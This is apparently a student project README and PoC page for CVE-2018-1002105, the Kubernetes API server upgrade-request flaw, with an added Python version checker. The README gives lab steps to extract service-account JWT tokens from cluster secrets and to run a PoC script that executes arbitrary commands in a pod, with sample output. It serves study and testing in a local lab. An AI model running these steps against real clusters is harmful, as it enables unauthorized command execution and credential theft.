
CVE-2018-1002105 PoC — Google Kubernetes permission and access control vulnerability

Associated Vulnerability
Title: Google Kubernetes permission and access control vulnerability (CVE-2018-1002105)
Description: In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server's TLS credentials used to establish the backend connection.
Readme
# CMPT733-Group11(0x90)

### CVE-2018-1002105
__Members__: Abhishek Rungta, Shubham Saini, Siddhant Sood

# Environment Setup

* A Linux VM (such as Ubuntu 20.04)
* Minikube for local deployment of Kubernetes
* Any of the vulnerable Kubernetes versions: 1.0.x to 1.9.x, 1.10.0 to 1.10.10, 1.11.0 to 1.11.4, or 1.12.0 to 1.12.2
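A quick way to tell whether a cluster's API server falls inside those ranges, as an added example that is not part of the group's PoC repository: the checker below encodes the fixed releases named in the advisory and reads the server version from `kubectl version -o json` output (a constructed sample is embedded so it runs offline).

```python
import json
import re

# Vulnerable and fixed versions as stated in the advisory:
# everything before v1.10.11 is affected, except that the 1.10, 1.11 and 1.12
# release lines each carry their own backported fixed patch level.
FIRST_FIXED = (1, 10, 11)
FIXED_PATCH_BY_LINE = {(1, 10): 11, (1, 11): 5, (1, 12): 3}

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch) from 'v1.12.2', '1.12.2' or 'v1.12.2-gke.1'."""
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError("unrecognised Kubernetes version string: %r" % text)
    return tuple(int(part) for part in match.groups())


def is_vulnerable(version_text):
    """True if the given kube-apiserver version is affected by CVE-2018-1002105."""
    major, minor, patch = parse_version(version_text)
    line = (major, minor)
    if line in FIXED_PATCH_BY_LINE:
        # A maintained line is fixed from its backported patch release onward.
        return patch < FIXED_PATCH_BY_LINE[line]
    # Older lines (1.0.x to 1.9.x) never received a fix; 1.13+ shipped fixed.
    return (major, minor, patch) < FIRST_FIXED


def server_version_from_kubectl_json(text):
    """Extract serverVersion.gitVersion from `kubectl version -o json` output."""
    return json.loads(text)["serverVersion"]["gitVersion"]


# Constructed sample of `kubectl version -o json` output, trimmed to the fields used.
SAMPLE_KUBECTL_JSON = ('{"clientVersion": {"gitVersion": "v1.18.0"}, '
                       '"serverVersion": {"gitVersion": "v1.12.2"}}')

if __name__ == "__main__":
    server = server_version_from_kubectl_json(SAMPLE_KUBECTL_JSON)
    verdict = "VULNERABLE" if is_vulnerable(server) else "patched"
    print("kube-apiserver %s: %s" % (server, verdict))
```

Against a live cluster, pipe the real output in with `kubectl version -o json` and pass it to `server_version_from_kubectl_json`.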


# Run the exploit

We have provided a VirtualBox image (.ova file). Download it and create a VM from it.
The OVA is pre-configured with Docker v18.09 and minikube v1.9.0.

[OVA link](https://drive.google.com/file/d/1sK7vb8ijzqo971J5ofyScwQBvgaOGogm/view?usp=sharing)
#### Build the kubernetes cluster

Our virtual image already has minikube and the required Kubernetes versions installed, so just run the following command to start minikube:
~~~
minikube start --kubernetes-version=v1.12.2
~~~


#### Create new user, namespace and assign role
Create a new user and a namespace, and assign an RBAC role to the new user, using the following command:

~~~
kubectl apply -f fixing_policy.yml
~~~


#### Remove access to conntrack

~~~
kubectl edit configmaps kube-proxy --namespace=kube-system
~~~

In the `conntrack` section, set `maxPerCore` to 0.



#### Get the JWT token

First, run the following command to list all the secrets (including the JWT tokens) stored in the cluster:

~~~
kubectl get secrets -A
~~~

To get the secret of the particular user created run the following command:
~~~
kubectl -n [namespace] get secrets [user-token] -o json
~~~

Then base64-decode the token value from the secret:

~~~
# Paste the base64-encoded token value from the secret's JSON output
export TOKEN=$(echo '<base64-token>' | base64 -d)
echo "$TOKEN"
~~~

#### Get the IP address and port number

~~~
kubectl cluster-info
~~~

#### To deploy the pod

~~~
kubectl run --image=nginx:alpine securenginx -n poc
~~~


#### Run the POC

Specify all the required arguments:

* `-t` target `ip:port` (required)
* `-j` JWT token of the user (required)
* `-p` pod (required)
* `-n` namespace
* `-m` method (required)
* `-c` container
* `-x` attacker command

#### Test case

Input
~~~
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
~~~

~~~
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0" 
~~~

Output
~~~
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02  
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:217603 (212.5 KiB)  TX bytes:428778 (418.7 KiB)

{"metadata":{},"status":"Success"}
~~~



# Video Demo

Demo video [link](https://youtu.be/NKioO9UwwAw)
